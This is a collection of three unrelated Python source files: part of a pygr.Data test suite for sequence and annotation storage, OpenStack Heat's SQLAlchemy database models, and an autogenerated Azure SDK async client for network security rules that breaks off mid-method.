sp_hbb1 = testutil.datafile('sp_hbb1')
sp = seqdb.BlastDB(sp_hbb1)
sp.__doc__ = 'little swissprot'
pygr.Data.Bio.Seq.Swissprot.sp42 = sp
# also store a fragment
hbb = sp['HBB1_TORMA']
ival= hbb[10:35]
ival.__doc__ = 'fragment'
pygr.Data.Bio.Seq.frag = ival
# build a mapping to itself
m = mapping.Mapping(sourceDB=sp,targetDB=sp)
trypsin = sp['PRCA_ANAVA']
m[hbb] = trypsin
m.__doc__ = 'map sp to itself'
pygr.Data.Bio.Seq.spmap = m
# create an annotation database and bind as exons attribute
pygr.Data.schema.Bio.Seq.spmap = \
pygr.Data.OneToManyRelation(sp, sp, bindAttrs=('buddy',))
annoDB = seqdb.AnnotationDB({1:('HBB1_TORMA',10,50)}, sp,
sliceAttrDict=dict(id=0, start=1, stop=2))
exon = annoDB[1]
# generate the names where these will be stored
tempdir = testutil.TempDir('exonAnnot')
filename = tempdir.subfile('cnested')
nlmsa = cnestedlist.NLMSA(filename, 'w', pairwiseMode=True,
bidirectional=False)
nlmsa.addAnnotation(exon)
nlmsa.build()
annoDB.__doc__ = 'a little annotation db'
nlmsa.__doc__ = 'a little map'
pygr.Data.Bio.Annotation.annoDB = annoDB
pygr.Data.Bio.Annotation.map = nlmsa
pygr.Data.schema.Bio.Annotation.map = \
pygr.Data.ManyToManyRelation(sp, annoDB, bindAttrs=('exons',))
def check_match(self):
frag = pygr.Data.Bio.Seq.frag()
correct = pygr.Data.Bio.Seq.Swissprot.sp42()['HBB1_TORMA'][10:35]
assert frag == correct, 'seq ival should match'
assert frag.__doc__ == 'fragment', 'docstring should match'
assert str(frag) == 'IQHIWSNVNVVEITAKALERVFYVY', 'letters should match'
assert len(frag) == 25, 'length should match'
assert len(frag.path) == 142, 'length should match'
#store = PygrDataTextFile('results/seqdb1.pickle')
#saved = store['hbb1 fragment']
#assert frag == saved, 'seq ival should matched stored result'
def check_dir(self):
expected=['Bio.Annotation.annoDB', 'Bio.Annotation.map',
'Bio.Seq.Swissprot.sp42', 'Bio.Seq.frag', 'Bio.Seq.spmap']
expected.sort()
found = pygr.Data.dir('Bio')
found.sort()
assert found == expected
def check_dir_noargs(self):
found = pygr.Data.dir()
found.sort()
found2 = pygr.Data.dir('')
found2.sort()
assert found == found2
def check_dir_download(self):
found = pygr.Data.dir(download=True)
found.sort()
found2 = pygr.Data.dir('', download=True)
found2.sort()
assert len(found) == 0
assert found == found2
def check_dir_re(self):
expected=['Bio.Annotation.annoDB', 'Bio.Annotation.map',
'Bio.Seq.Swissprot.sp42', 'Bio.Seq.frag', 'Bio.Seq.spmap']
expected.sort()
found = pygr.Data.dir('^Bio', 'r')
found.sort()
assert found == expected
expected = ['Bio.Seq.Swissprot.sp42', 'Bio.Seq.spmap']
expected.sort()
found = pygr.Data.dir('^Bio\..+\.sp', 'r')
found.sort()
assert found == expected
def check_bind(self):
sp = pygr.Data.Bio.Seq.Swissprot.sp42()
hbb = sp['HBB1_TORMA']
trypsin = sp['PRCA_ANAVA']
assert hbb.buddy == trypsin, 'automatic schema attribute binding'
def check_bind2(self):
sp = pygr.Data.Bio.Seq.Swissprot.sp42()
hbb = sp['HBB1_TORMA']
exons = hbb.exons.keys()
assert len(exons)==1, 'number of expected annotations'
annoDB = pygr.Data.Bio.Annotation.annoDB()
exon = annoDB[1]
assert exons[0] == exon, 'test annotation comparison'
assert exons[0].pathForward is exon,'annotation parent match'
assert exons[0].sequence == hbb[10:50],'annotation to sequence match'
onc = sp['HBB1_ONCMY']
try:
exons = onc.exons.keys()
raise ValueError('failed to catch query with no annotations')
except KeyError:
pass
class Sequence_Test(TestBase):
def setUp(self, *args, **kwargs):
TestBase.setUp(self, *args, **kwargs)
populate_swissprot()
pygr.Data.save() # finally save everything
pygr.Data.clear_cache() # force all requests to reload
def test_match(self):
"Test matching sequences"
check_match(self)
def test_dir(self):
"Test labels"
check_dir(self)
check_dir_noargs(self)
check_dir_re(self)
def test_bind(self):
"Test bind"
check_bind(self)
check_bind2(self)
def test_schema(self):
"Test schema"
sp_hbb1 = testutil.datafile('sp_hbb1')
sp2 = seqdb.BlastDB(sp_hbb1)
sp2.__doc__ = 'another sp'
pygr.Data.Bio.Seq.sp2 = sp2
sp = pygr.Data.Bio.Seq.Swissprot.sp42()
m = mapping.Mapping(sourceDB=sp,targetDB=sp2)
m.__doc__ = 'sp -> sp2'
pygr.Data.Bio.Seq.testmap = m
pygr.Data.schema.Bio.Seq.testmap = pygr.Data.OneToManyRelation(sp, sp2)
pygr.Data.save()
pygr.Data.clear_cache()
sp3 = seqdb.BlastDB(sp_hbb1)
sp3.__doc__ = 'sp number 3'
pygr.Data.Bio.Seq.sp3 = sp3
sp2 = pygr.Data.Bio.Seq.sp2()
m = mapping.Mapping(sourceDB=sp3,targetDB=sp2)
m.__doc__ = 'sp3 -> sp2'
pygr.Data.Bio.Seq.testmap2 = m
pygr.Data.schema.Bio.Seq.testmap2 = pygr.Data.OneToManyRelation(sp3, sp2)
l = pygr.Data.getResource.resourceCache.keys() # list of cached resources
l.sort()
assert l == ['Bio.Seq.sp2', 'Bio.Seq.sp3', 'Bio.Seq.testmap2']
pygr.Data.save()
g = pygr.Data.getResource.writer.storage.graph
expected = set(['Bio.Annotation.annoDB',
'Bio.Seq.Swissprot.sp42', 'Bio.Seq.sp2', 'Bio.Seq.sp3'])
found = set(g.keys())
self.EQ(len(expected - found), 0)
class SQL_Sequence_Test(Sequence_Test):
def setUp(self):
if not testutil.mysql_enabled():
raise SkipTest, "no MySQL installed"
self.dbtable = testutil.temp_table_name() # create temp db tables
Sequence_Test.setUp(self, pygrDataPath='mysql:' + self.dbtable,
mdbArgs=dict(createLayer='temp'))
def tearDown(self):
testutil.drop_tables(pygr.Data.getResource.writer.storage.cursor,
self.dbtable)
class InvalidPickle_Test(TestBase):
def setUp(self):
TestBase.setUp(self)
class MyUnpicklableClass(object):
pass
MyUnpicklableClass.__module__ = '__main__'
self.bad = MyUnpicklableClass()
self.good = datetime.datetime.today()
def test_invalid_pickle(self):
"Testing an invalid pickle"
s = pygr.Data.dumps(self.good) # should pickle with no errors
try:
s = pygr.Data.dumps(self.bad) # should raise exception
msg = 'failed to catch bad attempt to invalid module ref'
raise ValueError(msg)
except pygr.Data.WorldbaseNoModuleError:
pass
class XMLRPC_Test(TestBase):
'create an XMLRPC server and access seqdb from it'
def setUp(self):
TestBase.setUp(self)
populate_swissprot() # save some data
pygr.Data.save() # finally save everything
pygr.Data.clear_cache() # force all requests to reload
res = [ 'Bio.Seq.Swissprot.sp42', 'Bio.Seq.frag', 'Bio.Seq.spmap',
'Bio.Annotation.annoDB', 'Bio.Annotation.map' ]
self.server = testutil.TestXMLRPCServer(res, self.tempdir.path)
def test_xmlrpc(self):
"Test XMLRPC"
pygr.Data.clear_cache() # force all requests to reload
pygr.Data.update("http://localhost:%s" % self.server.port)
check_match(self)
check_dir(self)
check_dir_noargs(self)
check_dir_download(self)
check_dir_re(self)
check_bind(self)
check_bind2(self)
sb_hbb1 = testutil.datafile('sp_hbb1')
sp2 = seqdb.BlastDB(sb_hbb1)
sp2.__doc__ = 'another sp'
try:
pygr.Data.Bio.Seq.sp2 = sp2
pygr.Data.save()
msg = 'failed to catch bad attempt to write to XMLRPC server'
raise KeyError(msg)
except ValueError:
pass
def tearDown(self):
'halt the test XMLRPC server'
self.server.close()
if __name__ == '__main__':
PygrTestProgram(verbosity=2)
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for heat data.
"""
import uuid
from oslo_db.sqlalchemy import models
from oslo_utils import timeutils
import six
import sqlalchemy
from sqlalchemy.ext import declarative
from sqlalchemy.orm import backref
from sqlalchemy.orm import relationship
from sqlalchemy.orm import session as orm_session
from heat.db.sqlalchemy import types
BASE = declarative.declarative_base()
def get_session():
from heat.db.sqlalchemy import api as db_api
return db_api.get_session()
class HeatBase(models.ModelBase, models.TimestampMixin):
"""Base class for Heat Models."""
__table_args__ = {'mysql_engine': 'InnoDB'}
def expire(self, session=None, attrs=None):
"""Expire this object ()."""
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.expire(self, attrs)
def refresh(self, session=None, attrs=None):
"""Refresh this object."""
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.refresh(self, attrs)
def delete(self, session=None):
"""Delete this object."""
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.begin()
session.delete(self)
session.commit()
def update_and_save(self, values, session=None):
if not session:
session = orm_session.Session.object_session(self)
if not session:
session = get_session()
session.begin()
for k, v in six.iteritems(values):
setattr(self, k, v)
session.commit()
class SoftDelete(object):
deleted_at = sqlalchemy.Column(sqlalchemy.DateTime)
def soft_delete(self, session=None):
"""Mark this object as deleted."""
self.update_and_save({'deleted_at': timeutils.utcnow()},
session=session)
class StateAware(object):
action = sqlalchemy.Column('action', sqlalchemy.String(255))
status = sqlalchemy.Column('status', sqlalchemy.String(255))
status_reason = sqlalchemy.Column('status_reason', sqlalchemy.Text)
class RawTemplate(BASE, HeatBase):
"""Represents an unparsed template which should be in JSON format."""
__tablename__ = 'raw_template'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
template = sqlalchemy.Column(types.Json)
files = sqlalchemy.Column(types.Json)
environment = sqlalchemy.Column('environment', types.Json)
class StackTag(BASE, HeatBase):
"""Key/value store of arbitrary stack tags."""
__tablename__ = 'stack_tag'
id = sqlalchemy.Column('id',
sqlalchemy.Integer,
primary_key=True,
nullable=False)
tag = sqlalchemy.Column('tag', sqlalchemy.Unicode(80))
stack_id = sqlalchemy.Column('stack_id',
sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
class SyncPoint(BASE, HeatBase):
"""Represents an syncpoint for an stack that is being worked on."""
__tablename__ = 'sync_point'
__table_args__ = (
sqlalchemy.PrimaryKeyConstraint('entity_id',
'traversal_id',
'is_update'),
sqlalchemy.ForeignKeyConstraint(['stack_id'], ['stack.id'])
)
entity_id = sqlalchemy.Column(sqlalchemy.String(36))
traversal_id = sqlalchemy.Column(sqlalchemy.String(36))
is_update = sqlalchemy.Column(sqlalchemy.Boolean)
# integer field for atomic update operations
atomic_key = sqlalchemy.Column(sqlalchemy.Integer, nullable=False)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
nullable=False)
input_data = sqlalchemy.Column(types.Json)
class Stack(BASE, HeatBase, SoftDelete, StateAware):
"""Represents a stack created by the heat engine."""
__tablename__ = 'stack'
__table_args__ = (
sqlalchemy.Index('ix_stack_name', 'name', mysql_length=255),
sqlalchemy.Index('ix_stack_tenant', 'tenant', mysql_length=255),
)
id = sqlalchemy.Column(sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
name = sqlalchemy.Column(sqlalchemy.String(255))
raw_template_id = sqlalchemy.Column(
sqlalchemy.Integer,
sqlalchemy.ForeignKey('raw_template.id'),
nullable=False)
raw_template = relationship(RawTemplate, backref=backref('stack'),
foreign_keys=[raw_template_id])
prev_raw_template_id = sqlalchemy.Column(
'prev_raw_template_id',
sqlalchemy.Integer,
sqlalchemy.ForeignKey('raw_template.id'))
prev_raw_template = relationship(RawTemplate,
foreign_keys=[prev_raw_template_id])
username = sqlalchemy.Column(sqlalchemy.String(256))
tenant = sqlalchemy.Column(sqlalchemy.String(256))
user_creds_id = sqlalchemy.Column(
sqlalchemy.Integer,
sqlalchemy.ForeignKey('user_creds.id'))
owner_id = sqlalchemy.Column(sqlalchemy.String(36))
parent_resource_name = sqlalchemy.Column(sqlalchemy.String(255))
timeout = sqlalchemy.Column(sqlalchemy.Integer)
disable_rollback = sqlalchemy.Column(sqlalchemy.Boolean, nullable=False)
stack_user_project_id = sqlalchemy.Column(sqlalchemy.String(64))
backup = sqlalchemy.Column('backup', sqlalchemy.Boolean)
nested_depth = sqlalchemy.Column('nested_depth', sqlalchemy.Integer)
convergence = sqlalchemy.Column('convergence', sqlalchemy.Boolean)
tags = relationship(StackTag, cascade="all,delete",
backref=backref('stack'))
current_traversal = sqlalchemy.Column('current_traversal',
sqlalchemy.String(36))
current_deps = sqlalchemy.Column('current_deps', types.Json)
# Override timestamp column to store the correct value: it should be the
# time the create/update call was issued, not the time the DB entry is
# created/modified. (bug #1193269)
updated_at = sqlalchemy.Column(sqlalchemy.DateTime)
class StackLock(BASE, HeatBase):
"""Store stack locks for deployments with multiple-engines."""
__tablename__ = 'stack_lock'
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
primary_key=True)
engine_id = sqlalchemy.Column(sqlalchemy.String(36))
class UserCreds(BASE, HeatBase):
"""
Represents user credentials and mirrors the 'context'
handed in by wsgi.
"""
__tablename__ = 'user_creds'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
username = sqlalchemy.Column(sqlalchemy.String(255))
password = sqlalchemy.Column(sqlalchemy.String(255))
region_name = sqlalchemy.Column(sqlalchemy.String(255))
decrypt_method = sqlalchemy.Column(sqlalchemy.String(64))
tenant = sqlalchemy.Column(sqlalchemy.String(1024))
auth_url = sqlalchemy.Column(sqlalchemy.Text)
tenant_id = sqlalchemy.Column(sqlalchemy.String(256))
trust_id = sqlalchemy.Column(sqlalchemy.String(255))
trustor_user_id = sqlalchemy.Column(sqlalchemy.String(64))
stack = relationship(Stack, backref=backref('user_creds'))
class Event(BASE, HeatBase):
"""Represents an event generated by the heat engine."""
__tablename__ = 'event'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
stack = relationship(Stack, backref=backref('events'))
uuid = sqlalchemy.Column(sqlalchemy.String(36),
default=lambda: str(uuid.uuid4()),
unique=True)
resource_action = sqlalchemy.Column(sqlalchemy.String(255))
resource_status = sqlalchemy.Column(sqlalchemy.String(255))
resource_name = sqlalchemy.Column(sqlalchemy.String(255))
physical_resource_id = sqlalchemy.Column(sqlalchemy.String(255))
_resource_status_reason = sqlalchemy.Column(
'resource_status_reason', sqlalchemy.String(255))
resource_type = sqlalchemy.Column(sqlalchemy.String(255))
resource_properties = sqlalchemy.Column(sqlalchemy.PickleType)
@property
def resource_status_reason(self):
return self._resource_status_reason
@resource_status_reason.setter
def resource_status_reason(self, reason):
self._resource_status_reason = reason and reason[:255] or ''
class ResourceData(BASE, HeatBase):
"""Key/value store of arbitrary, resource-specific data."""
__tablename__ = 'resource_data'
id = sqlalchemy.Column('id',
sqlalchemy.Integer,
primary_key=True,
nullable=False)
key = sqlalchemy.Column('key', sqlalchemy.String(255))
value = sqlalchemy.Column('value', sqlalchemy.Text)
redact = sqlalchemy.Column('redact', sqlalchemy.Boolean)
decrypt_method = sqlalchemy.Column(sqlalchemy.String(64))
resource_id = sqlalchemy.Column('resource_id',
sqlalchemy.Integer,
sqlalchemy.ForeignKey('resource.id'),
nullable=False)
class Resource(BASE, HeatBase, StateAware):
"""Represents a resource created by the heat engine."""
__tablename__ = 'resource'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
uuid = sqlalchemy.Column(sqlalchemy.String(36),
default=lambda: str(uuid.uuid4()),
unique=True)
name = sqlalchemy.Column('name', sqlalchemy.String(255))
nova_instance = sqlalchemy.Column('nova_instance', sqlalchemy.String(255))
# odd name as "metadata" is reserved
rsrc_metadata = sqlalchemy.Column('rsrc_metadata', types.Json)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
stack = relationship(Stack, backref=backref('resources'))
data = relationship(ResourceData,
cascade="all,delete",
backref=backref('resource'))
# Override timestamp column to store the correct value: it should be the
# time the create/update call was issued, not the time the DB entry is
# created/modified. (bug #1193269)
updated_at = sqlalchemy.Column(sqlalchemy.DateTime)
properties_data = sqlalchemy.Column('properties_data', types.Json)
properties_data_encrypted = sqlalchemy.Column('properties_data_encrypted',
sqlalchemy.Boolean)
engine_id = sqlalchemy.Column(sqlalchemy.String(36))
atomic_key = sqlalchemy.Column(sqlalchemy.Integer)
needed_by = sqlalchemy.Column('needed_by', types.List)
requires = sqlalchemy.Column('requires', types.List)
replaces = sqlalchemy.Column('replaces', sqlalchemy.Integer,
default=None)
replaced_by = sqlalchemy.Column('replaced_by', sqlalchemy.Integer,
default=None)
current_template_id = sqlalchemy.Column(
'current_template_id',
sqlalchemy.Integer,
sqlalchemy.ForeignKey('raw_template.id'))
class WatchRule(BASE, HeatBase):
"""Represents a watch_rule created by the heat engine."""
__tablename__ = 'watch_rule'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column('name', sqlalchemy.String(255))
rule = sqlalchemy.Column('rule', types.Json)
state = sqlalchemy.Column('state', sqlalchemy.String(255))
last_evaluated = sqlalchemy.Column(sqlalchemy.DateTime,
default=timeutils.utcnow)
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
stack = relationship(Stack, backref=backref('watch_rule'))
class WatchData(BASE, HeatBase):
"""Represents a watch_data created by the heat engine."""
__tablename__ = 'watch_data'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
data = sqlalchemy.Column('data', types.Json)
watch_rule_id = sqlalchemy.Column(
sqlalchemy.Integer,
sqlalchemy.ForeignKey('watch_rule.id'),
nullable=False)
watch_rule = relationship(WatchRule, backref=backref('watch_data'))
class SoftwareConfig(BASE, HeatBase):
"""
Represents a software configuration resource to be applied to
one or more servers.
"""
__tablename__ = 'software_config'
id = sqlalchemy.Column('id', sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
name = sqlalchemy.Column('name', sqlalchemy.String(255))
group = sqlalchemy.Column('group', sqlalchemy.String(255))
config = sqlalchemy.Column('config', types.Json)
tenant = sqlalchemy.Column(
'tenant', sqlalchemy.String(64), nullable=False, index=True)
class SoftwareDeployment(BASE, HeatBase, StateAware):
"""
Represents applying a software configuration resource to a
single server resource.
"""
__tablename__ = 'software_deployment'
__table_args__ = (
sqlalchemy.Index('ix_software_deployment_created_at', 'created_at'),)
id = sqlalchemy.Column('id', sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
config_id = sqlalchemy.Column(
'config_id',
sqlalchemy.String(36),
sqlalchemy.ForeignKey('software_config.id'),
nullable=False)
config = relationship(SoftwareConfig, backref=backref('deployments'))
server_id = sqlalchemy.Column('server_id', sqlalchemy.String(36),
nullable=False, index=True)
input_values = sqlalchemy.Column('input_values', types.Json)
output_values = sqlalchemy.Column('output_values', types.Json)
tenant = sqlalchemy.Column(
'tenant', sqlalchemy.String(64), nullable=False, index=True)
stack_user_project_id = sqlalchemy.Column(sqlalchemy.String(64))
updated_at = sqlalchemy.Column(sqlalchemy.DateTime)
class Snapshot(BASE, HeatBase):
__tablename__ = 'snapshot'
id = sqlalchemy.Column('id', sqlalchemy.String(36), primary_key=True,
default=lambda: str(uuid.uuid4()))
stack_id = sqlalchemy.Column(sqlalchemy.String(36),
sqlalchemy.ForeignKey('stack.id'),
nullable=False)
name = sqlalchemy.Column('name', sqlalchemy.String(255))
data = sqlalchemy.Column('data', types.Json)
tenant = sqlalchemy.Column(
'tenant', sqlalchemy.String(64), nullable=False, index=True)
status = sqlalchemy.Column('status', sqlalchemy.String(255))
status_reason = sqlalchemy.Column('status_reason', sqlalchemy.String(255))
stack = relationship(Stack, backref=backref('snapshot'))
class Service(BASE, HeatBase, SoftDelete):
__tablename__ = 'service'
id = sqlalchemy.Column('id',
sqlalchemy.String(36),
primary_key=True,
default=lambda: str(uuid.uuid4()))
engine_id = sqlalchemy.Column('engine_id',
sqlalchemy.String(36),
nullable=False)
host = sqlalchemy.Column('host',
sqlalchemy.String(255),
nullable=False)
hostname = sqlalchemy.Column('hostname',
sqlalchemy.String(255),
nullable=False)
binary = sqlalchemy.Column('binary',
sqlalchemy.String(255),
nullable=False)
topic = sqlalchemy.Column('topic',
sqlalchemy.String(255),
nullable=False)
report_interval = sqlalchemy.Column('report_interval',
sqlalchemy.Integer,
nullable=False)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SecurityRulesOperations:
"""SecurityRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_security_group_name=network_security_group_name,
security_rule_name=security_rule_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def get(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
**kwargs: Any
) -> "_models.SecurityRule":
"""Get the specified network security rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_security_group_name: The name of the network security group.
:type network_security_group_name: str
:param security_rule_name: The name of the security rule.
:type security_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecurityRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_11_01.models.SecurityRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('SecurityRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkSecurityGroups/{networkSecurityGroupName}/securityRules/{securityRuleName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
network_security_group_name: str,
security_rule_name: str,
security_rule_parameters: "_models.SecurityRule",
**kwargs: Any
) -> "_models.SecurityRule":
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecurityRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(security_rule_parameters, 'SecurityRule')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
